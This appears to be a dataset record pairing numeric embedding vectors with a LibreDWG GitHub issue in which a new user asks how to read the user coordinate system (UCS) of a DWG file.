-0.0014364469097927213, 0.013055837713181973, -0.007306664250791073, -0.024825051426887512, 0.005027987062931061, -0.020653685554862022, 0.0052142092026770115, -0.0049331835471093655, 0.02068077214062214, 0.01619790680706501, 0.003052343847230077, 0.002436119131743908, -0.0023260789457708597, -0.005197279620915651, -0.010408102534711361, -0.007828084751963615, -0.014518524520099163, 0.0004655543598346412, -0.021953850984573364, 0.024743791669607162, -0.005691614001989365, -0.005549408029764891, -0.00676831416785717, -0.030201781541109085, 0.018012721091508865, 0.003809081157669425, -0.007658792659640312, -0.020423447713255882, -0.0006124156061559916, -0.002734073903411627, 0.009074077941477299, -0.02753373235464096, -0.004137508571147919, 0.019732734188437462, 0.012250005267560482, -0.004117193631827831, -0.011308738961815834, -0.004983971361070871, 0.010198180563747883, -0.0015117820585146546, -0.033668890595436096, 0.015845777466893196, 0.02058596722781658, 0.002844114089384675, 0.0028712006751447916, 0.007266033906489611, -0.0056001958437263966, 0.0004238660912960768, -0.033993933349847794, -0.013211586512625217, -0.0049568843096494675, 0.027113886550068855, 0.015141521580517292, -0.003541599027812481, -0.01743035577237606, 0.008071866817772388, -0.018730521202087402, 0.004225540906190872, -0.010739916004240513, -0.0057491734623909, 0.01103109959512949, -0.02662632428109646, 0.006101301871240139, 0.013340248726308346, -0.0010106762638315558, 0.016631295904517174, -0.005894764792174101, 0.009426206350326538, 0.01566971279680729, -0.02585435099899769, -0.0007778990548104048, 0.007855172269046307, 0.01850028522312641, -0.006734455469995737, -0.01411222293972969, 0.008816753514111042, -0.006185947917401791, 0.008112496696412563, 0.013556943275034428, -0.020315099507570267, -0.028603659942746162, 0.007665564306080341, -0.0004829068493563682, 0.004597984254360199, 0.02337590791285038, 0.01434246078133583, -0.020179666578769684, -0.009487152099609375, 0.017728310078382492, -0.00017976747767534107, 0.010787318460643291, 0.02322693169116974, -0.012825599871575832, -0.010821176692843437, 0.013827810995280743, 0.0017386339604854584, -0.0017030825838446617, 0.012250005267560482, 0.0013848126400262117, -0.02739829756319523, -0.009866367094218731, -0.015696801245212555, 0.010719601064920425, -0.0072931209579110146, 0.011464487761259079, 0.021872591227293015, 0.0019096194300800562, 0.0010191408218815923, -0.0005832126480527222, -0.04128028452396393, 0.017728310078382492, 0.004032547120004892, -0.0013416430447250605, 0.008674548007547855, 0.004774048458784819, -0.004750347696244717, 0.010841491632163525, 0.0030946668703109026, -0.0038124669808894396, -0.023565515875816345, 0.015439475886523724, -0.0015473334351554513, 0.006805558688938618, 0.0010132156312465668, 0.02129022404551506, -0.016956336796283722, -0.02684301882982254, -0.001914698164910078, -0.007543673738837242, -0.026030413806438446, 0.0037887662183493376, 0.0015058567514643073, 0.0033672277349978685, -0.003148840507492423, -0.020856836810708046, -0.022807085886597633, 0.00659902160987258, 0.0015439476119354367, 0.01936706155538559, 0.000178180358489044, -0.005535864736884832, 0.018689891323447227, 0.007360837887972593, -0.01703759655356407, 0.004113807808607817, 0.00046936344006098807, -0.003998688887804747, -0.02784522995352745, -0.021859047934412956, -0.0003277926007285714, -0.02622002176940441, 0.0019248557509854436, -0.017565790563821793, 0.016522947698831558, 0.014681045897305012, 0.008938644081354141, -0.023348821327090263, -0.03900499269366264, 0.018405480310320854, -0.010706057772040367, -0.01446435134857893, -0.0036296311300247908, -0.005173578858375549, 0.022563304752111435, -0.01180307287722826, 0.01812106929719448, 0.0052379099652171135, -0.015439475886523724, -0.02035572938621044, -0.005193893797695637, -0.012283863499760628, -0.0027442313730716705, -0.008031236007809639, -0.031068559736013412, -0.02253621816635132, 0.017484528943896294, -0.013597573153674603, -0.01835130713880062, -0.009730933234095573, 0.03109564632177353, 0.00561035331338644, 0.033370938152074814, 0.0038056953344494104, -0.0028525786474347115, -0.010428418405354023, 0.005146491806954145, -0.005603581666946411, 0.02367386221885681, 0.030797692015767097, -0.0027239162009209394, -0.007861943915486336, -0.013448596000671387, -0.03943838179111481, 0.012487014755606651, 0.00983250793069601, 0.014748762361705303, -0.008349506184458733, 0.007767139934003353, 0.00019606186833698303, 0.009900225326418877, 0.008986045606434345, 0.005278540309518576, 0.022089285776019096, -0.017267834395170212, -0.01927225850522518, 0.0067649283446371555, 0.00412396527826786, -0.01621145009994507, -0.008234387263655663, -0.01744389906525612, -0.025109464302659035, -0.005579880904406309, 0.008186984807252884, -0.003280888544395566, -0.026653410866856575, -0.023118583485484123, 0.0012578432215377688, 0.002918602665886283, 0.003109903307631612, 0.012141657993197441, 0.00013363527250476182, 0.013672062195837498, -0.009846052154898643, -0.010706057772040367, 0.023728037253022194, 0.01067897118628025, 0.008965730667114258, 0.0036804189439862967, 0.0025072218850255013, 0.012791741639375687, 0.0041815247386693954, 0.013435052707791328, 0.0032013212330639362, -0.015249867923557758, 0.008633917197585106, -0.012405754067003727, 0.01789083145558834, 0.009703845717012882, 0.02715451642870903, 0.000673784117680043, 0.01659066416323185, 0.001169811119325459, 0.021236050873994827, -0.02676175907254219, -0.01260890532284975, -0.0037819943390786648, -0.0004397372540552169, -0.018324220553040504, 0.009588726796209812, -0.011701497249305248, 0.008383364416658878, 0.0013628046726807952, -0.0001456973550375551, 0.01006274577230215, -0.018716977909207344, 0.012866229750216007, -0.005017829593271017, -0.021615266799926758, -0.0107602309435606, -0.006856346037238836, 0.01465395838022232, 0.021087072789669037, 0.0010140620870515704, -0.01828359067440033, 0.020856836810708046, 0.011660867370665073, -0.015182151459157467, 0.001914698164910078, 0.0032013212330639362, 0.0305539108812809, -0.0013831197284162045, -0.010320071130990982, 0.009737704880535603, 0.01365174725651741, -0.002463205950334668, 0.024811508134007454, 0.009609042666852474, 0.008471396751701832, -0.01261567696928978, 0.0252178106456995, 0.014328917488455772, -0.0031843918841332197, 0.006003112066537142, 0.0056746844202280045, -0.00043846757034771144, -0.014220570214092731, 0.0038937274366617203, -0.0030354144982993603, 0.014830023050308228, -0.011166533455252647, -0.012635991908609867, 0.00012866230099461973, -0.0021076917182654142, -0.0031251395121216774, -0.01951603963971138, 0.009243370033800602, 0.004398219287395477, -0.018188785761594772, -0.007022252772003412, 0.017647050321102142, -0.0023887171410024166, -0.011769214645028114, -0.009101164527237415, 0.003985145594924688, 0.019245171919465065, 0.009399119764566422, -0.014667501673102379, 0.001621822128072381, 0.001471998286433518, 0.0006526226061396301, -0.007936432026326656, 0.0254615917801857, -0.0051566497422754765, -0.013333477079868317, -0.010692514479160309, -0.0049568843096494675, -0.0012451463844627142, 0.004699559882283211, -0.0016125109978020191, 0.0151144340634346, -0.01226354856044054, -0.010008572600781918, 0.008315647952258587, -0.0011046335566788912, 0.00653807632625103, 0.0058473628014326096, -0.0153582151979208, 0.0010648497845977545, 0.00223804684355855, -0.015710344538092613, 0.01835130713880062, -0.01168118230998516, -0.007076426409184933, -0.003346912795677781, -0.017322009429335594, -0.006961307488381863, -0.016834445297718048, 0.008220843970775604, -0.022928975522518158, -0.008633917197585106, 0.00561035331338644, -0.03001217357814312, -0.005031372886151075, -0.007584304083138704, 0.013604344800114632, -0.007455641869455576, 0.0019671788904815912, -0.00006739957461832091, 0.008329191245138645, 0.02166943997144699, 0.021276680752635002, 0.011931735090911388, 0.0017691066022962332, -0.014477894641458988, 0.005055074114352465, -0.020789118483662605, -0.01561554055660963, -0.008207300677895546, 0.022563304752111435, -0.003829396329820156, -0.000014072438716539182, -0.012446384876966476, -0.002156786387786269, 0.013719463720917702, 0.02114124782383442, 0.0017691066022962332, -0.00039466313319280744, 0.043393053114414215, 0.014789393171668053, -0.022251805290579796, 0.004025775473564863, 0.009141795337200165, -0.014559155330061913, -0.0031776202376931906, -0.009074077941477299, -0.014640415087342262, -0.0013848126400262117, -0.0055189356207847595, 0.020409904420375824, 0.023782210424542427, 0.0013966631377115846, 0.008078638464212418, 0.01572388783097267, -0.012757882475852966, 0.013516313396394253, -0.014708132483065128, -0.02004423178732395, -0.018080439418554306, -0.007868715561926365, -0.0000217567321669776, 0.003077737521380186, 0.029605872929096222, -0.00005163421155884862, -0.012778197415173054, 0.0011359526542946696, -0.017105314880609512, 0.0023176143877208233, -0.02168298326432705, 0.01076700259000063, -0.0032301009632647038, -0.01967856101691723, -0.024703161790966988, 0.0075639886781573296, 0.003421401372179389, 0.008925100788474083, -0.01067897118628025, -0.005759330932050943, 0.016522947698831558, -0.0009370339685119689, 0.008559429086744785, -0.01319127157330513, 0.0027442313730716705, -0.0019485566299408674, 0.02630128338932991, 0.011755671352148056, 0.008566200733184814, 0.015859320759773254, -0.02028801292181015, 0.017389725893735886, -0.006378941237926483, 0.0071780020371079445, -0.031149819493293762, -0.017565790563821793, -0.00277808983810246, 0.0030049418564885855, -0.0044049909338355064, -0.000034625605621840805, -0.0042627849616110325, 0.01603538542985916, 0.006798786576837301, 0.007882258854806423, -0.012371895834803581, 0.015304042026400566, 0.0064026424661278725, -0.0056509836576879025, 0.006974850781261921, 0.01565616950392723, -0.008166669867932796, 0.010936295613646507, 0.006290909368544817, 0.02329464815557003, -0.014328917488455772, -0.00503475870937109, -0.0002585942856967449, -0.012873001396656036, -0.002029817085713148, 0.008308876305818558, 0.018175242468714714, 0.0026104904245585203, -0.0016768422210589051, -0.004090106580406427, -0.013062609359622002, 0.012744339182972908, -0.010618025436997414, -0.0303101297467947, -0.0053191701881587505, -0.0028474999126046896, 0.007475956808775663, -0.010232038795948029, 0.020030688494443893, 0.03085186518728733, -0.0036601037718355656, 0.023565515875816345, 0.019163910299539566, -0.0014796163886785507, 0.02868492156267166, 0.0037819943390786648, -0.0019130052533000708, -0.006940992549061775, -0.027574362233281136, 0.005481691099703312, 0.004879009909927845, 0.03897790610790253, 0.009493923746049404, 0.0041815247386693954, 0.010787318460643291, -0.001736941048875451, 0.019163910299539566, -0.0016489089466631413, -0.013685605488717556, 0.007611390668898821, 0.008098953403532505, 0.018242958933115005, 0.01214842963963747, 0.006494060158729553, -0.04279714450240135, 0.0002323539520148188, 0.0037549075204879045, -0.01052999310195446, -0.006456816103309393, 0.0027239162009209394, -0.036296311765909195, -0.017945004627108574, 0.010076289996504784, -0.02575954608619213, 0.007834856398403645, 0.012683394365012646, -0.00929754413664341, 0.012114571407437325, -0.018419023603200912, 0.009392348118126392, -0.004313572775572538, -0.010238810442388058, -0.0006293448386713862, -0.014870652928948402, -0.00952778197824955, 0.011017556302249432, -0.005055074114352465, 0.005579880904406309, 0.023565515875816345, -0.020315099507570267, -0.005356414709240198, -0.012480243109166622, -0.005176964681595564, -0.004919640254229307, 0.006693825591355562, 0.018175242468714714, 0.008884469978511333, 0.001040302449837327, 0.001084318500943482, 0.00761816231533885, 0.007875487208366394, 0.011545748449862003, 0.0012823906727135181, -0.0014618407003581524, 0.011152990162372589, 0.0002564781461842358, -0.0008134504314512014, 0.0008583129965700209, -0.000978510593995452, 0.02615230530500412, 0.01943477801978588, 0.003995303064584732, -0.004371132235974073, -0.0001267577608814463, -0.009317859075963497, 0.006223192438483238, 0.005647597834467888, 0.02684301882982254, 0.0069883945398032665, 0.0331813283264637, -0.0077874548733234406, -0.01820232905447483, -0.011796301230788231, 0.006091143935918808, 0.009541325271129608, -0.006849574390798807, -0.01967856101691723, -0.0064026424661278725, 0.015453019179403782, -0.014613328501582146, 0.017322009429335594, 0.009744476526975632, 0.013577258214354515, 0.01284591481089592, 0.009033448062837124, -0.0012696937192231417, 0.021777786314487457, 0.0035280557349324226, -0.002410725224763155, 0.06376232951879501, -0.0012409139890223742, -0.015425932593643665, -0.005532478913664818, 0.0018080439185723662, -0.0034247871953994036, 0.0010572316823527217, 0.007821313105523586, 0.0033926216419786215, -0.008823525160551071, -0.015073804184794426, -0.0004456625028979033, -0.02444583736360073, -0.008972502313554287, 0.0022312751971185207, 0.031420689076185226, -0.0020907623693346977, 0.003626245306804776, -0.01897430419921875, -0.008512026630342007, 0.007658792659640312, -0.014207026921212673, -0.01354339998215437, -0.005887993145734072, -0.006497445981949568, -0.00005155485632712953, 0.004178138915449381, -0.01728137768805027, -0.0022160387597978115, -0.0022414326667785645, -0.007740052882581949, 0.017105314880609512, -0.013936158269643784, -0.020423447713255882, 0.015100890770554543, 0.005217595025897026, -0.010590938851237297, 0.01728137768805027, 0.0008870926685631275, -0.005322556011378765, 0.0011681182077154517, 0.016373969614505768, 0.012236461974680424, -0.002156786387786269, 0.008092181757092476, 0.007855172269046307, -0.0038361679762601852, -0.0030828164890408516, 0.00952101033180952, -0.01565616950392723, -0.0028779725544154644, -0.011850475333631039, 0.001430521602742374, 0.013015206903219223, 0.007415011525154114, 0.0068969763815402985, 0.02700554020702839, -0.016942793503403664, -0.00790934544056654, -0.006626108195632696, 0.002390410052612424, 0.013360563665628433, -0.009236598387360573, -0.00014622638991568238, 0.01365174725651741, -0.0000014184860219756956, -0.0015033173840492964, -0.025420961901545525, -0.0052954694256186485, 0.027520189061760902, 0.005522321444004774, -0.008986045606434345, -0.010902437381446362, -0.005779645871371031, -0.005099090281873941, -0.005515549797564745, -0.0009454985847696662, 0.006328153423964977, 0.005000900477170944, -0.004316958598792553, 0.012507329694926739, -0.02414788119494915, 0.0008460392709821463, -0.014504981227219105, -0.0005324248922988772, -0.019556669518351555, 0.018960759043693542, 0.02384992688894272, 0.039140425622463226, 0.026328369975090027, -0.0019874938298016787, -0.02367386221885681, 0.0016743028536438942, -0.01160669419914484, -0.011064957827329636, -0.012649535201489925, -0.01882532611489296, -0.0038767983205616474, -0.017403269186615944, -0.012940718792378902, 0.00801769271492958, 0.022400783374905586, 0.014396633952856064, -0.005857520271092653, 0.0034383307211101055, -0.003313054097816348, -0.014044505544006824, 0.005505391862243414, -0.0006225731922313571, -0.0028221060056239367, 0.012649535201489925, -0.0037989236880093813, -0.01331316214054823, 0.007394696585834026, -0.03063517063856125, 0.02352488599717617, 0.0014482972910627723, -0.004269556608051062, -0.027818143367767334, -0.01912328042089939, 0.010265897028148174, 0.009900225326418877, -0.007977062836289406, -0.007022252772003412, -0.0010301448637619615, 0.008647460490465164, 0.011599921621382236, -0.015764517709612846, 0.010116919875144958, -0.020179666578769684, -0.005309012718498707, -0.004059634171426296, 0.006439886521548033, 0.0033875429071485996, 0.00671414053067565, 0.009500695392489433, 0.015710344538092613, -0.013516313396394253, -0.0026443488895893097, 0.0035348273813724518, -0.009852823801338673, 0.0010039045009762049, 0.02097872644662857, -0.016387514770030975, -0.020328642800450325, 0.005617124959826469, -0.00238025258295238, -0.0077061946503818035, 0.01981399394571781, 0.014274743385612965, -0.002365016145631671, -0.013374107889831066, 0.019637929275631905, -0.00312344660051167, 0.0006026813061907887, 0.015168608166277409, 0.009168881922960281, 0.01673964224755764, 0.013164184987545013, -0.0029101381078362465, 0.014030962251126766, -0.004469322040677071, 0.0010453811846673489, 0.0060945297591388226, -0.003873412264510989, -0.00960227008908987, -0.006128388457000256, -0.03502323105931282, -0.0006318842642940581, 0.024283315986394882, 0.0013306390028446913, 0.007110285107046366, -0.00332659762352705, -0.001019987277686596, -0.01011014822870493, 0.0017978863324970007, -0.004137508571147919, 0.021114161238074303, -0.00014040696260053664, 0.004276328720152378, -0.008762579411268234, -0.009128251112997532, -0.0012104413472115993, 0.02214345894753933, 0.0015405617887154222, -0.009554868564009666, -0.005783031694591045, 0.009006360545754433, -0.00021013431251049042, 0.009683530777692795, -0.004811292979866266, 0.003426480107009411, 0.008383364416658878, 0.014288286678493023, -0.024879226461052895, 0.018473196774721146, 0.01913682371377945, 0.0007055265014059842, -0.003910656552761793, -0.017173031345009804, -0.0023684019688516855, 0.0033621490001678467, 0.018933672457933426, 0.007983834482729435, 0.002378559671342373, -0.02030155621469021, -0.018649261444807053, -0.011213934980332851, 0.006886818911880255, 0.009500695392489433, 0.004614913370460272, -0.0023988746106624603, 0.014911283738911152, 0.020098404958844185, 0.01611664518713951, -0.011992680840194225, 0.0007486960967071354, -0.0005861753015778959, -0.0016345190815627575, 0.0010453811846673489, -0.015304042026400566, -0.010550308972597122, 0.024364575743675232, 0.01711885817348957, 0.009270457550883293, 0.007638477720320225, 0.007110285107046366, -0.025258440524339676, 0.02120896428823471, -0.008356277830898762, -0.022089285776019096, 0.02909122221171856, -0.0019519425695762038, -0.0032842743676155806, 0.0009675066103227437, -0.007712966296821833, -0.00567129859700799, -0.009202740155160427, 0.005275154486298561, 0.029958000406622887, 0.004604755900800228, -0.0017877287464216352, 0.014383090659976006, -0.009473607875406742, 0.0303101297467947, 0.01780957169830799, -0.011037871241569519, -0.011823387816548347, 0.028197359293699265, 0.02769625373184681, 0.01149157527834177, 0.024120794609189034, 0.02120896428823471, 0.0004939108621329069, 0.018310677260160446, 0.009920540265738964, 0.0036668754182755947, -0.009554868564009666, -0.011884333565831184, 0.020084861665964127, 0.013468910939991474, -0.019637929275631905, -0.001774185337126255, -0.012175516225397587, -0.021845504641532898, -0.026179391890764236, 0.00482145044952631, 0.008200529031455517, 0.04358265921473503, -0.007110285107046366, 0.013753322884440422, -0.03865286335349083, 0.03009343519806862, -0.005776260048151016, -0.019786907359957695, 0.02053179405629635, -0.0021974167320877314, -0.0019130052533000708, -0.0015464869793504477, -0.01469458919018507, -0.009846052154898643, -0.011092044413089752, -0.013333477079868317, 0.0019367061322554946, 0.027344124391674995, 0.00323856552131474, 0.007814541459083557, 0.005827047862112522, 0.006744612939655781, -0.033370938152074814, -0.012588590383529663, -0.0005252299597486854, 0.0024090323131531477, 0.013137097470462322, -0.023809297010302544, -0.02498757280409336, 0.006609179079532623, -0.022238261997699738, -0.009311087429523468, -0.0252178106456995, -0.008789666928350925, -0.015182151459157467, -0.015331128612160683, -0.020965183153748512, -0.005762716755270958, -0.0010800861055031419, 0.0008109110640361905, -0.018066896125674248, -0.04249918833374977, 0.004191682208329439, -0.0009014825336635113, 0.009121479466557503, 0.011538976803421974, 0.011274880729615688, -0.021886134520173073, -0.014288286678493023, -0.03299172222614288, -0.01828359067440033, 0.0050483024679124355, 0.03280211612582207, -0.01927225850522518, 0.018175242468714714, -0.01952958293259144, -0.02166943997144699, -0.01307615265250206, 0.008410451002418995, 0.004100264515727758, -0.014681045897305012, 0.023484256118535995, -0.006690439768135548, -0.009053763002157211, -0.01703759655356407, 0.015845777466893196, 0.0006416185642592609, 0.01859508827328682, 0.012859458103775978, 0.013922614976763725, 0.01469458919018507, 0.030526824295520782, 0.016387514770030975, -0.01627916656434536, -0.004120579455047846, 0.0036601037718355656, -0.006216420792043209, 0.010367472656071186, -0.0020789119880646467, 0.002908445196226239, 0.006372169591486454, 0.008410451002418995, -0.01780957169830799, 0.011830159462988377, 0.0010504599194973707, -0.0003305436111986637, 0.02005777508020401, -0.010482591576874256, 0.009040219709277153, -0.010577395558357239, 0.009432977996766567, 0.017633507028222084, 0.003873412264510989, -0.008647460490465164, 0.0009742783149704337, 0.011525433510541916, -0.0009057148708961904, 0.0029406107496470213, -0.009791878052055836, 0.009439749643206596, -0.013353792019188404, 0.006328153423964977, 0.012101028114557266, 0.008383364416658878, 0.004350817296653986, -0.02715451642870903, -0.009128251112997532, 0.009155338630080223, 0.0011867404682561755, 0.0019790292717516422, -0.0020213525276631117, 0.010347157716751099, -0.0035280557349324226, 0.005468147806823254, 0.021791329607367516, 0.011850475333631039, -0.00732697919011116, 0.008552657440304756, -0.017917918041348457, 0.00309635978192091, 0.01890658587217331, -0.005332713946700096, 0.017227204516530037, 0.009311087429523468, 0.002339622238650918, 0.0006847881595604122, 0.005017829593271017, 0.023700950667262077, 0.01052999310195446, 0.0037312067579478025, 0.033452197909355164, -0.01111235935240984, 0.0022786769550293684, 0.006724298000335693, -0.010042430832982063, 0.043934788554906845, 0.001799579244107008, 0.021886134520173073, -0.01997651532292366, -0.005258224904537201, -0.010116919875144958, -0.0066159507259726524, 0.00036736472975462675, 0.008349506184458733, 0.013123554177582264, -0.016712555661797523, 0.012764654122292995, -0.007665564306080341, -0.012866229750216007, -0.01867634803056717, 0.006257050670683384, 0.0060132695361971855, 0.015168608166277409, -0.015087347477674484, -0.01843256689608097, -0.005752559285610914, 0.007089969702064991, 0.007645249366760254, -0.017240747809410095, -0.012236461974680424, -0.017267834395170212, -0.0033486057072877884, 0.0059320093132555485, 0.002957539865747094, 0.013170956633985043, 0.026517977938055992, -0.010191407985985279, 0.0037819943390786648, -0.00033435269142501056, -0.0018859184347093105, 0.0020941481925547123, 0.010245582088828087, 0.022509131580591202, -0.001250225119292736, 0.0048993248492479324, -0.012175516225397587, 0.005309012718498707, 0.0008337655453942716, -0.014030962251126766, 0.013103239238262177, -0.00048671592958271503, -0.004774048458784819, -0.006832645274698734, -0.004449007101356983, -0.02544804848730564, 0.014951913617551327, -0.002143243094906211, -0.022482043132185936, -0.0010292984079569578, 0.002899980405345559, 0.017376182600855827, 0.0031065172515809536, -0.026504432782530785, -0.00584059115499258, -0.004523495677858591, 0.00578641751781106, -0.0058744498528540134, 0.007875487208366394, 0.007245718967169523, -0.02043699100613594, -0.008058322593569756, -0.01665838249027729, 0.002334543503820896, 0.00738792447373271, -0.0009201047359965742, -0.01581869088113308, -0.01192496344447136, -0.004151051864027977, 0.013252216391265392, 0.008004149422049522, -0.025515764951705933, 0.0018012721557170153, -0.0029236814007163048, -0.004851922858506441, -0.011816616170108318, 0.02122250758111477, 0.0008413837058469653, 0.01999005861580372, 0.007238947320729494, 0.0011808151612058282, -0.012019767425954342, 0.005996340420097113, -0.006775085814297199, 0.004327116068452597, 0.014071592129766941, -0.017416812479496002, 0.0031826989725232124, 0.0023768667597323656, -0.011288424022495747, -0.013008435256779194, -0.013218358159065247, -0.004259399138391018, -0.014748762361705303, 0.00578641751781106, 0.017633507028222084, 0.006561777088791132, 0.02638254314661026, -0.010496134869754314, -0.0002370095025980845, 0.0006733608897775412, -0.007184773683547974, 0.0050483024679124355, 0.008809981867671013, -0.021506918594241142, -0.0006259590154513717, 0.00002376707925577648, -0.000710605236236006, 0.009107936173677444, -0.006026812829077244, -0.008864155039191246, -0.014735219068825245, -0.006859731860458851, 0.02253621816635132, 0.009392348118126392, 0.009195968508720398, -0.015087347477674484, -0.02360614575445652, 0.0005091471830382943, -0.013110010884702206, 0.017064683139324188, -0.0027120658196508884, 0.0021466289181262255, 0.010211723856627941, 0.011423857882618904, -0.004381289705634117, -0.0005607813945971429, -0.007638477720320225, 0.022712280973792076, 0.01017786469310522, 0.011633780784904957, 0.0165094044059515, -0.008234387263655663, 0.008809981867671013, 0.021032899618148804, 0.017945004627108574, 0.008823525160551071, 0.033370938152074814, -0.01319127157330513, -0.003981759771704674, 0.0018622174393385649, 0.01619790680706501, -0.010191407985985279, -0.005877835676074028, -0.01705113984644413, -0.03407519310712814, 0.010225267149508, 0.01044873334467411, 0.0064026424661278725, -0.005972639191895723, -0.01690216362476349, 0.012358352541923523, 0.015872864052653313, -0.005783031694591045, 0.024256229400634766, 0.00041561308898963034, -0.011674410663545132, 0.01029298361390829, 0.004019003827124834, 0.01018463633954525, 0.01419348269701004, 0.003216557437554002, 0.0029592327773571014, -0.013631432317197323, 0.000005640878953272477, 0.008931872434914112, -0.009338174015283585, -0.002688364824280143, 0.01780957169830799, -0.011356140486896038, 0.013468910939991474, 0.010502906516194344, 0.007117056753486395, -0.01874406635761261, 0.018920129165053368, -0.007943203672766685, 0.00688343308866024, 0.0070357960648834705, -0.0008261473849415779, 0.0025241512339562178, 0.022319523617625237, -0.010123691521584988, -0.014139309525489807, 0.005478305276483297, -0.002664663828909397, -0.011586378328502178, 0.004929797723889351, 0.017389725893735886, -0.004516724031418562, 0.007685879245400429, -0.009595498442649841, 0.0023057637736201286, -0.0013526470866054296, 0.015222781337797642, 0.026274194940924644, 0.01713240146636963, 0.015534279868006706, 0.010198180563747883, 0.017389725893735886, 0.009981486015021801 ]
174
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
I get the UCS_Control from the dwg_data and dont know what to do next. I'm really looking forward to some help.
I'm new to the project, could you please tell me how to read the UserCoordinateSystem of a dwg?
https://api.github.com/repos/LibreDWG/libredwg/issues/335/comments
3
2021-04-16T17:12:29
2021-04-17T15:05:56Z
https://github.com/LibreDWG/libredwg/issues/335
860,008,697
335
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : I'm new to the project, could you please tell me how to read the UserCoordinateSystem of a dwg? Issue date: --- start body --- I get the UCS_Control from the dwg_data and dont know what to do next. I'm really looking forward to some help. --- end body ---
318
[ 0.024786677211523056, 0.035820744931697845, -0.010452563874423504, 0.000298021623166278, 0.039367929100990295, -0.0069090137258172035, 0.03087794780731201, 0.04076354578137398, -0.018215663731098175, 0.015627963468432426, -0.0039360662922263145, -0.043176792562007904, 0.011433854699134827, -0.009551229886710644, 0.006076733581721783, 0.02405979484319687, -0.023827193304896355, 0.04675305262207985, -0.0028366572223603725, -0.00892611127346754, 0.047625310719013214, 0.02038177289068699, 0.0024150656536221504, 0.03849567100405693, -0.0028293882496654987, -0.002905710833147168, 0.0013038446195423603, 0.005895013455301523, -0.03302951902151108, -0.021908223628997803, 0.024466849863529205, 0.026095064356923103, -0.003739807987585664, 0.002346011810004711, 0.030034765601158142, -0.004106883425265551, 0.006316605024039745, 0.007472347468137741, -0.062453702092170715, 0.07146704196929932, -0.015715189278125763, -0.02083243802189827, 0.02404525689780712, 0.02631312981247902, -0.010714241303503513, -0.03250616416335106, -0.020599836483597755, 0.02360912784934044, 0.015235447324812412, 0.007305164355784655, 0.01025630533695221, -0.022780483588576317, -0.006207572296261787, -0.023361988365650177, 0.005022754892706871, -0.016456609591841698, 0.0483521930873394, 0.004045098554342985, 0.011237596161663532, 0.007421465590596199, 0.014435877092182636, 0.008620820939540863, -0.005030023865401745, 0.005942260380834341, -0.004005120135843754, 0.02625497803092003, -0.03744896128773689, 0.034076228737831116, -0.004041464067995548, 0.007726755924522877, 0.021254030987620354, 0.026356741786003113, 0.02432147227227688, 0.00040591819561086595, 0.011121295392513275, -0.0033291196450591087, 0.04957335442304611, 0.03332027047872543, 0.017706846818327904, 0.03750711306929588, -0.016558373346924782, 0.00861355196684599, -0.0245104618370533, -0.011143101379275322, 0.0015246350085362792, 0.002195183653384447, -0.008344605565071106, -0.06175589561462402, 0.0048555717803537846, 0.02012009546160698, -0.051492322236299515, 0.04343847185373306, -0.008002971298992634, -0.031488530337810516, 0.0006387475878000259, -0.025818848982453346, 0.02122495509684086, -0.01940775103867054, -0.011143101379275322, -0.03340749815106392, 0.012291574850678444, 0.04204285517334938, -0.020745212212204933, -0.026269515976309776, 0.042275458574295044, 0.00699623953551054, 0.03954238072037697, 0.030907023698091507, -0.011273940093815327, 0.06698944419622421, 0.014581253752112389, -0.01334555447101593, 0.028232097625732422, 0.015424436889588833, -0.0286973025649786, 0.02824663557112217, -0.003298227209597826, -0.04750901088118553, 0.006963529624044895, -0.024801215156912804, -0.008526326157152653, 0.022896783426404, 0.006614626385271549, -0.026589345186948776, -0.025106504559516907, 0.047683462500572205, -0.0050590988248586655, -0.0032418938353657722, 0.005469787400215864, 0.01157196145504713, -0.00754503533244133, -0.040530942380428314, -0.03570444509387016, 0.0046338727697730064, 0.024452311918139458, 0.04186840355396271, 0.011259403079748154, 0.045677267014980316, 0.016398457810282707, 0.013767145574092865, -0.04105429723858833, -0.04486315697431564, 0.0002423697296762839, 0.0005306238890625536, -0.03436698392033577, 0.02275140769779682, 0.005157228093594313, 0.004506668541580439, 0.02986031398177147, -0.0209487397223711, -0.021065041422843933, -0.025746161118149757, 0.009471273049712181, -0.008657164871692657, 0.06483788043260574, -0.0032164528965950012, -0.032913219183683395, 0.02320207469165325, 0.009224132634699345, 0.03282599151134491, 0.010874154977500439, -0.02714177407324314, -0.007272454909980297, -0.019116997718811035, 0.0322444885969162, 0.002391441958025098, 0.002291495678946376, 0.0348031111061573, -0.01740155555307865, 0.005418905522674322, 0.0015355382347479463, -0.03395992890000343, 0.009674799628555775, 0.0064292713068425655, 0.008155616000294685, -0.019509512931108475, -0.019262373447418213, 0.0022387965582311153, -0.020032867789268494, -0.034977562725543976, -0.015627963468432426, -0.02991846390068531, 0.020599836483597755, 0.03628595173358917, 0.0038524747360497713, -0.012967575341463089, 0.03204096108675003, 0.0022333450615406036, 0.002734893700107932, 0.015700651332736015, 0.00472473306581378, 0.029714936390519142, 0.013432780280709267, 0.02167562209069729, -0.006916282698512077, -0.021123191341757774, 0.012822198681533337, -0.0031165066175162792, 0.0028820871375501156, -0.0029602269642055035, 0.010488907806575298, 0.012291574850678444, 0.010874154977500439, -0.00806112214922905, -0.0016245812876150012, 0.0018262910889461637, -0.02901712991297245, 0.021835535764694214, -0.03494848683476448, -0.034657735377550125, -0.009921940043568611, -0.018811706453561783, 0.01914607174694538, 0.014624866656959057, -0.018404653295874596, 0.017576007172465324, 0.03855382278561592, -0.01063428446650505, 0.003272786270827055, -0.03584982082247734, 0.054138172417879105, -0.04041464254260063, 0.044456105679273605, -0.021704697981476784, -0.05282978713512421, 0.0013538177590817213, 0.013483661226928234, 0.0014873823383823037, -0.023216612637043, -0.012720435857772827, 0.009907402098178864, -0.0065346695482730865, 0.012822198681533337, 0.0031146896071732044, 0.003594431560486555, -0.022068139165639877, 0.015686113387346268, -0.02618229016661644, -0.06024398282170296, -0.03250616416335106, -0.0010730596259236336, 0.018026674166321754, 0.016151318326592445, -0.030092915520071983, 0.028014034032821655, 0.04343847185373306, 0.0017708663363009691, -0.0012247961713001132, 0.006203938275575638, -0.005000948440283537, 0.03771064057946205, 0.0445142537355423, 0.045357439666986465, -0.009631186723709106, 0.03448328375816345, 0.017517857253551483, 0.016035016626119614, 0.020192783325910568, 0.007886669598519802, -0.010568864643573761, 0.032796915620565414, 0.04131597280502319, -0.008519057184457779, -0.03361102566123009, -0.0006405647727660835, -0.017706846818327904, 0.02102142758667469, -0.01253871526569128, 0.005106346216052771, -0.027679666876792908, 0.031168701127171516, 0.014479489997029305, 